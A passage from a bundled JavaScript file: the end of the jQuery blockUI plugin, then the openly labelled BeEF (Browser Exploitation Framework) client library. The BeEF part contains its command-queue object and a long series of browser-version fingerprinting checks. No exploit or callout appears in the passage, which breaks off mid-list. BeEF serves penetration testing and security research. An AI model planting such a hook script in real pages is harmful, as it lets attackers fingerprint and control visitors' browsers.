2458 lyr2._fadeIn(opts.fadeIn, cb1);
2459 if (msg)
2460 lyr3._fadeIn(opts.fadeIn, cb2);
2461 }
2462 else {
2463 if (opts.showOverlay)
2464 lyr2.show();
2465 if (msg)
2466 lyr3.show();
2467 if (opts.onBlock)
2468 opts.onBlock.bind(lyr3)();
2469 }
2470
2471 // bind key and mouse events
2472 bind(1, el, opts);
2473
2474 if (full) {
2475 pageBlock = lyr3[0];
2476 pageBlockEls = $(opts.focusableElements,pageBlock);
2477 if (opts.focusInput)
2478 setTimeout(focus, 20);
2479 }
2480 else
2481 center(lyr3[0], opts.centerX, opts.centerY);
2482
2483 if (opts.timeout) {
2484 // auto-unblock
2485 var to = setTimeout(function() {
2486 if (full)
2487 $.unblockUI(opts);
2488 else
2489 $(el).unblock(opts);
2490 }, opts.timeout);
2491 $(el).data('blockUI.timeout', to);
2492 }
2493 }
2494
2495 // remove the block
2496 function remove(el, opts) {
2497 var count;
2498 var full = (el == window);
2499 var $el = $(el);
2500 var data = $el.data('blockUI.history');
2501 var to = $el.data('blockUI.timeout');
2502 if (to) {
2503 clearTimeout(to);
2504 $el.removeData('blockUI.timeout');
2505 }
2506 opts = $.extend({}, $.blockUI.defaults, opts || {});
2507 bind(0, el, opts); // unbind events
2508
2509 if (opts.onUnblock === null) {
2510 opts.onUnblock = $el.data('blockUI.onUnblock');
2511 $el.removeData('blockUI.onUnblock');
2512 }
2513
2514 var els;
2515 if (full) // crazy selector to handle odd field errors in ie6/7
2516 els = $('body').children().filter('.blockUI').add('body > .blockUI');
2517 else
2518 els = $el.find('>.blockUI');
2519
2520 // fix cursor issue
2521 if ( opts.cursorReset ) {
2522 if ( els.length > 1 )
2523 els[1].style.cursor = opts.cursorReset;
2524 if ( els.length > 2 )
2525 els[2].style.cursor = opts.cursorReset;
2526 }
2527
2528 if (full)
2529 pageBlock = pageBlockEls = null;
2530
2531 if (opts.fadeOut) {
2532 count = els.length;
2533 els.stop().fadeOut(opts.fadeOut, function() {
2534 if ( --count === 0)
2535 reset(els,data,opts,el);
2536 });
2537 }
2538 else
2539 reset(els, data, opts, el);
2540 }
2541
2542 // move blocking element back into the DOM where it started
2543 function reset(els,data,opts,el) {
2544 var $el = $(el);
2545 if ( $el.data('blockUI.isBlocked') )
2546 return;
2547
2548 els.each(function(i,o) {
2549 // remove via DOM calls so we don't lose event handlers
2550 if (this.parentNode)
2551 this.parentNode.removeChild(this);
2552 });
2553
2554 if (data && data.el) {
2555 data.el.style.display = data.display;
2556 data.el.style.position = data.position;
2557 data.el.style.cursor = 'default'; // #59
2558 if (data.parent)
2559 data.parent.appendChild(data.el);
2560 $el.removeData('blockUI.history');
2561 }
2562
2563 if ($el.data('blockUI.static')) {
2564 $el.css('position', 'static'); // #22
2565 }
2566
2567 if (typeof opts.onUnblock == 'function')
2568 opts.onUnblock(el,opts);
2569
2570 // fix issue in Safari 6 where block artifacts remain until reflow
2571 var body = $(document.body), w = body.width(), cssW = body[0].style.width;
2572 body.width(w-1).width(w);
2573 body[0].style.width = cssW;
2574 }
2575
2576 // bind/unbind the handler
2577 function bind(b, el, opts) {
2578 var full = el == window, $el = $(el);
2579
2580 // don't bother unbinding if there is nothing to unbind
2581 if (!b && (full && !pageBlock || !full && !$el.data('blockUI.isBlocked')))
2582 return;
2583
2584 $el.data('blockUI.isBlocked', b);
2585
2586 // don't bind events when overlay is not in use or if bindEvents is false
2587 if (!full || !opts.bindEvents || (b && !opts.showOverlay))
2588 return;
2589
2590 // bind anchors and inputs for mouse and key events
2591 var events = 'mousedown mouseup keydown keypress keyup touchstart touchend touchmove';
2592 if (b)
2593 $(document).bind(events, opts, handler);
2594 else
2595 $(document).unbind(events, handler);
2596
2597 // former impl...
2598 // var $e = $('a,:input');
2599 // b ? $e.bind(events, opts, handler) : $e.unbind(events, handler);
2600 }
2601
2602 // event handler to suppress keyboard/mouse events when blocking
2603 function handler(e) {
2604 // allow tab navigation (conditionally)
2605 if (e.type === 'keydown' && e.keyCode && e.keyCode == 9) {
2606 if (pageBlock && e.data.constrainTabKey) {
2607 var els = pageBlockEls;
2608 var fwd = !e.shiftKey && e.target === els[els.length-1];
2609 var back = e.shiftKey && e.target === els[0];
2610 if (fwd || back) {
2611 setTimeout(function(){focus(back);},10);
2612 return false;
2613 }
2614 }
2615 }
2616 var opts = e.data;
2617 var target = $(e.target);
2618 if (target.hasClass('blockOverlay') && opts.onOverlayClick)
2619 opts.onOverlayClick(e);
2620
2621 // allow events within the message content
2622 if (target.parents('div.' + opts.blockMsgClass).length > 0)
2623 return true;
2624
2625 // allow events for content that is not being blocked
2626 return target.parents().children().filter('div.blockUI').length === 0;
2627 }
2628
2629 function focus(back) {
2630 if (!pageBlockEls)
2631 return;
2632 var e = pageBlockEls[back===true ? pageBlockEls.length-1 : 0];
2633 if (e)
2634 e.focus();
2635 }
2636
2637 function center(el, x, y) {
2638 var p = el.parentNode, s = el.style;
2639 var l = ((p.offsetWidth - el.offsetWidth)/2) - sz(p,'borderLeftWidth');
2640 var t = ((p.offsetHeight - el.offsetHeight)/2) - sz(p,'borderTopWidth');
2641 if (x) s.left = l > 0 ? (l+'px') : '0';
2642 if (y) s.top = t > 0 ? (t+'px') : '0';
2643 }
2644
2645 function sz(el, p) {
2646 return parseInt($.css(el,p),10)||0;
2647 }
2648
2649 }
2650
2651
2652 /*global define:true */
2653 if (typeof define === 'function' && define.amd && define.amd.jQuery) {
2654 define(['jquery'], setup);
2655 } else {
2656 setup(jQuery);
2657 }
2658
2659})();
2660
2661
2662//
2663// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
2664// Browser Exploitation Framework (BeEF) - http://beefproject.com
2665// See the file 'doc/COPYING' for copying permission
2666//
2667
2668/*!
2669 * BeEF JS Library 0.4.7.0-alpha
2670 * Register the BeEF JS on the window object.
2671 */
2672
2673$j = jQuery.noConflict();
2674
2675if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
2676
2677 var BeefJS = {
2678
2679 version: '0.4.7.0-alpha',
2680
2681 // This get set to true during window.onload(). It's a useful hack when messing with document.write().
2682 pageIsLoaded: false,
2683
2684 // An array containing functions to be executed by the window.onpopstate() method.
2685 onpopstate: new Array(),
2686
2687 // An array containing functions to be executed by the window.onclose() method.
2688 onclose: new Array(),
2689
2690 // An array containing functions to be executed by Beef.
2691 commands: new Array(),
2692
2693 // An array containing all the BeEF JS components.
2694 components: new Array(),
2695
2696 /**
2697 * Adds a function to display debug messages (wraps console.log())
2698 * @param: {string} the debug string to return
2699 */
2700 debug: function(msg) {
2701 if (!false) return;
2702 if (typeof console == "object" && typeof console.log == "function") {
2703 console.log(msg);
2704 } else {
2705 // TODO: maybe add a callback to BeEF server for debugging purposes
2706 //window.alert(msg);
2707 }
2708 },
2709
2710 /**
2711 * Adds a function to execute.
2712 * @param: {Function} the function to execute.
2713 */
2714 execute: function(fn) {
2715 if ( typeof beef.websocket == "undefined"){
2716 this.commands.push(fn);
2717 }else{
2718 fn();
2719 }
2720 },
2721
2722
2723
2724 /**
2725 * Registers a component in BeEF JS.
2726 * @params: {String} the component.
2727 *
2728 * Components are very important to register so the framework does not
2729 * send them back over and over again.
2730 */
2731 regCmp: function(component) {
2732 this.components.push(component);
2733 }
2734
2735 };
2736
2737 window.beef = BeefJS;
2738}
2739
2740
2741//
2742// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
2743// Browser Exploitation Framework (BeEF) - http://beefproject.com
2744// See the file 'doc/COPYING' for copying permission
2745//
2746
2747/**
2748 * @literal object: beef.browser
2749 *
2750 * Basic browser functions.
2751 */
2752beef.browser = {
2753
2754 /**
2755 * Returns the user agent that the browser is claiming to be.
2756 * @example: beef.browser.getBrowserReportedName()
2757 */
2758 getBrowserReportedName: function () {
2759 return navigator.userAgent;
2760 },
2761
2762 /**
2763 * Returns true if Avant Browser.
2764 * @example: beef.browser.isA()
2765 */
2766 isA: function () {
2767 return window.navigator.userAgent.match(/Avant TriCore/) != null;
2768 },
2769
2770 /**
2771 * Returns true if Iceweasel.
2772 * @example: beef.browser.isI()
2773 */
2774 isI: function () {
2775 return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
2776 },
2777
2778 /**
2779 * Returns true if IE6.
2780 * @example: beef.browser.isIE6()
2781 */
2782 isIE6: function () {
2783 return !window.XMLHttpRequest && !window.globalStorage;
2784 },
2785
2786 /**
2787 * Returns true if IE7.
2788 * @example: beef.browser.isIE7()
2789 */
2790 isIE7: function () {
2791 return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
2792 },
2793
2794 /**
2795 * Returns true if IE8.
2796 * @example: beef.browser.isIE8()
2797 */
2798 isIE8: function () {
2799 return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
2800 },
2801
2802 /**
2803 * Returns true if IE9.
2804 * @example: beef.browser.isIE9()
2805 */
2806 isIE9: function () {
2807 return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
2808 },
2809
2810 /**
2811 *
2812 * Returns true if IE10.
2813 * @example: beef.browser.isIE10()
2814 */
2815 isIE10: function () {
2816 return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
2817 },
2818
2819 /**
2820 *
2821 * Returns true if IE11.
2822 * @example: beef.browser.isIE11()
2823 */
2824 isIE11: function () {
2825 return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined" && typeof document.selection === "undefined" && typeof document.createStyleSheet === "undefined" && typeof window.createPopup === "undefined" && typeof window.XDomainRequest === "undefined";
2826 },
2827
2828 /**
2829 * Returns true if IE.
2830 * @example: beef.browser.isIE()
2831 */
2832 isIE: function () {
2833 return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10() || this.isIE11();
2834 },
2835
2836 /**
2837 * Returns true if FF2.
2838 * @example: beef.browser.isFF2()
2839 */
2840 isFF2: function () {
2841 return !!window.globalStorage && !window.postMessage;
2842 },
2843
2844 /**
2845 * Returns true if FF3.
2846 * @example: beef.browser.isFF3()
2847 */
2848 isFF3: function () {
2849 return !!window.globalStorage && !!window.postMessage && !JSON.parse;
2850 },
2851
2852 /**
2853 * Returns true if FF3.5.
2854 * @example: beef.browser.isFF3_5()
2855 */
2856 isFF3_5: function () {
2857 return !!window.globalStorage && !!JSON.parse && !window.FileReader;
2858 },
2859
2860 /**
2861 * Returns true if FF3.6.
2862 * @example: beef.browser.isFF3_6()
2863 */
2864 isFF3_6: function () {
2865 return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
2866 },
2867
2868 /**
2869 * Returns true if FF4.
2870 * @example: beef.browser.isFF4()
2871 */
2872 isFF4: function () {
2873 return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
2874 },
2875
2876 /**
2877 * Returns true if FF5.
2878 * @example: beef.browser.isFF5()
2879 */
2880 isFF5: function () {
2881 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
2882 },
2883
2884 /**
2885 * Returns true if FF6.
2886 * @example: beef.browser.isFF6()
2887 */
2888 isFF6: function () {
2889 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
2890 },
2891
2892 /**
2893 * Returns true if FF7.
2894 * @example: beef.browser.isFF7()
2895 */
2896 isFF7: function () {
2897 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
2898 },
2899
2900 /**
2901 * Returns true if FF8.
2902 * @example: beef.browser.isFF8()
2903 */
2904 isFF8: function () {
2905 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
2906 },
2907
2908 /**
2909 * Returns true if FF9.
2910 * @example: beef.browser.isFF9()
2911 */
2912 isFF9: function () {
2913 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
2914 },
2915
2916 /**
2917 * Returns true if FF10.
2918 * @example: beef.browser.isFF10()
2919 */
2920 isFF10: function () {
2921 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
2922 },
2923
2924 /**
2925 * Returns true if FF11.
2926 * @example: beef.browser.isFF11()
2927 */
2928 isFF11: function () {
2929 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
2930 },
2931
2932 /**
2933 * Returns true if FF12
2934 * @example: beef.browser.isFF12()
2935 */
2936 isFF12: function () {
2937 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
2938 },
2939
2940 /**
2941 * Returns true if FF13
2942 * @example: beef.browser.isFF13()
2943 */
2944 isFF13: function () {
2945 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
2946 },
2947
2948 /**
2949 * Returns true if FF14
2950 * @example: beef.browser.isFF14()
2951 */
2952 isFF14: function () {
2953 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
2954 },
2955
2956 /**
2957 * Returns true if FF15
2958 * @example: beef.browser.isFF15()
2959 */
2960 isFF15: function () {
2961 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
2962 },
2963
2964 /**
2965 * Returns true if FF16
2966 * @example: beef.browser.isFF16()
2967 */
2968 isFF16: function () {
2969 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
2970 },
2971
2972 /**
2973 * Returns true if FF17
2974 * @example: beef.browser.isFF17()
2975 */
2976 isFF17: function () {
2977 return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
2978 },
2979
2980 /**
2981 * Returns true if FF18
2982 * @example: beef.browser.isFF18()
2983 */
2984 isFF18: function () {
2985 return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
2986 },
2987
2988 /**
2989 * Returns true if FF19
2990 * @example: beef.browser.isFF19()
2991 */
2992 isFF19: function () {
2993 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
2994 },
2995
2996 /**
2997 * Returns true if FF20
2998 * @example: beef.browser.isFF20()
2999 */
3000 isFF20: function () {
3001 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
3002 },
3003
3004 /**
3005 * Returns true if FF21
3006 * @example: beef.browser.isFF21()
3007 */
3008 isFF21: function () {
3009 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
3010 },
3011
3012 /**
3013 * Returns true if FF22
3014 * @example: beef.browser.isFF22()
3015 */
3016 isFF22: function () {
3017 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
3018 },
3019
3020 /**
3021 * Returns true if FF23
3022 * @example: beef.browser.isFF23()
3023 */
3024 isFF23: function () {
3025 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
3026 },
3027
3028 /**
3029 * Returns true if FF24
3030 * @example: beef.browser.isFF24()
3031 */
3032 isFF24: function () {
3033 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
3034 },
3035
3036 /**
3037 * Returns true if FF25
3038 * @example: beef.browser.isFF25()
3039 */
3040 isFF25: function () {
3041 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
3042 },
3043
3044 /**
3045 * Returns true if FF26
3046 * @example: beef.browser.isFF26()
3047 */
3048 isFF26: function () {
3049 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
3050 },
3051
3052 /**
3053 * Returns true if FF27
3054 * @example: beef.browser.isFF27()
3055 */
3056 isFF27: function () {
3057 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/27./) != null;
3058 },
3059
3060 /**
3061 * Returns true if FF28
3062 * @example: beef.browser.isFF28()
3063 */
3064 isFF28: function () {
3065 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
3066 },
3067
3068 /**
3069 * Returns true if FF29
3070 * @example: beef.browser.isFF29()
3071 */
3072 isFF29: function () {
3073 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
3074 },
3075
3076 /**
3077 * Returns true if FF30
3078 * @example: beef.browser.isFF30()
3079 */
3080 isFF30: function () {
3081 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
3082 },
3083
3084 /**
3085 * Returns true if FF31
3086 * @example: beef.browser.isFF31()
3087 */
3088 isFF31: function () {
3089 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
3090 },
3091
3092 /**
3093 * Returns true if FF32
3094 * @example: beef.browser.isFF32()
3095 */
3096 isFF32: function () {
3097 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
3098 },
3099
3100 /**
3101 * Returns true if FF33
3102 * @example: beef.browser.isFF33()
3103 */
3104 isFF33: function () {
3105 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
3106 },
3107
3108 /**
3109 * Returns true if FF34
3110 * @example: beef.browser.isFF34()
3111 */
3112 isFF34: function () {
3113 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
3114 },
3115
3116 /**
3117 * Returns true if FF35
3118 * @example: beef.browser.isFF35()
3119 */
3120 isFF35: function () {
3121 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
3122 },
3123
3124 /**
3125 * Returns true if FF36
3126 * @example: beef.browser.isFF36()
3127 */
3128 isFF36: function () {
3129 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
3130 },
3131
3132 /**
3133 * Returns true if FF37
3134 * @example: beef.browser.isFF37()
3135 */
3136 isFF37: function () {
3137 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
3138 },
3139
3140 /**
3141 * Returns true if FF38
3142 * @example: beef.browser.isFF38()
3143 */
3144 isFF38: function () {
3145 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
3146 },
3147
3148 /**
3149 * Returns true if FF39
3150 * @example: beef.browser.isFF39()
3151 */
3152 isFF39: function () {
3153 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
3154 },
3155
3156 /**
3157 * Returns true if FF40
3158 * @example: beef.browser.isFF40()
3159 */
3160 isFF40: function () {
3161 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/40./) != null;
3162 },
3163
3164 /**
3165 * Returns true if FF41
3166 * @example: beef.browser.isFF41()
3167 */
3168 isFF41: function () {
3169 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/41./) != null;
3170 },
3171
3172 /**
3173 * Returns true if FF42
3174 * @example: beef.browser.isFF42()
3175 */
3176 isFF42: function () {
3177 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/42./) != null;
3178 },
3179
3180 /**
3181 * Returns true if FF43
3182 * @example: beef.browser.isFF43()
3183 */
3184 isFF43: function () {
3185 return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/43./) != null;
3186 },
3187
3188 /**
3189 * Returns true if FF.
3190 * @example: beef.browser.isFF()
3191 */
3192 isFF: function () {
3193 return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43();
3194 },
3195
3196 /**
3197 * Returns true if Safari 4.xx
3198 * @example: beef.browser.isS4()
3199 */
3200 isS4: function () {
3201 return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
3202 },
3203
3204 /**
3205 * Returns true if Safari 5.xx
3206 * @example: beef.browser.isS5()
3207 */
3208 isS5: function () {
3209 return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
3210 },
3211
3212 /**
3213 * Returns true if Safari 6.xx
3214 * @example: beef.browser.isS6()
3215 */
3216 isS6: function () {
3217 return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
3218 },
3219
3220 /**
3221 * Returns true if Safari 7.xx
3222 * @example: beef.browser.isS7()
3223 */
3224 isS7: function () {
3225 return (window.navigator.userAgent.match(/ Version\/7\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
3226 },
3227
3228 /**
3229 * Returns true if Safari 8.xx
3230 * @example: beef.browser.isS8()
3231 */
3232 isS8: function () {
3233 return (window.navigator.userAgent.match(/ Version\/8\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
3234 },
3235
3236 /**
3237 * Returns true if Safari.
3238 * @example: beef.browser.isS()
3239 */
3240 isS: function () {
3241 return this.isS4() || this.isS5() || this.isS6() || this.isS7() || this.isS8();
3242 },
3243
3244 /**
3245 * Returns true if Chrome 5.
3246 * @example: beef.browser.isC5()
3247 */
3248 isC5: function () {
3249 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false);
3250 },
3251
3252 /**
3253 * Returns true if Chrome 6.
3254 * @example: beef.browser.isC6()
3255 */
3256 isC6: function () {
3257 return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false);
3258 },
3259
3260 /**
3261 * Returns true if Chrome 7.
3262 * @example: beef.browser.isC7()
3263 */
3264 isC7: function () {
3265 return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false);
3266 },
3267
3268 /**
3269 * Returns true if Chrome 8.
3270 * @example: beef.browser.isC8()
3271 */
3272 isC8: function () {
3273 return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false);
3274 },
3275
3276 /**
3277 * Returns true if Chrome 9.
3278 * @example: beef.browser.isC9()
3279 */
3280 isC9: function () {
3281 return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false);
3282 },
3283
3284 /**
3285 * Returns true if Chrome 10.
3286 * @example: beef.browser.isC10()
3287 */
3288 isC10: function () {
3289 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false);
3290 },
3291
3292 /**
3293 * Returns true if Chrome 11.
3294 * @example: beef.browser.isC11()
3295 */
3296 isC11: function () {
3297 return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false);
3298 },
3299
3300 /**
3301 * Returns true if Chrome 12.
3302 * @example: beef.browser.isC12()
3303 */
3304 isC12: function () {
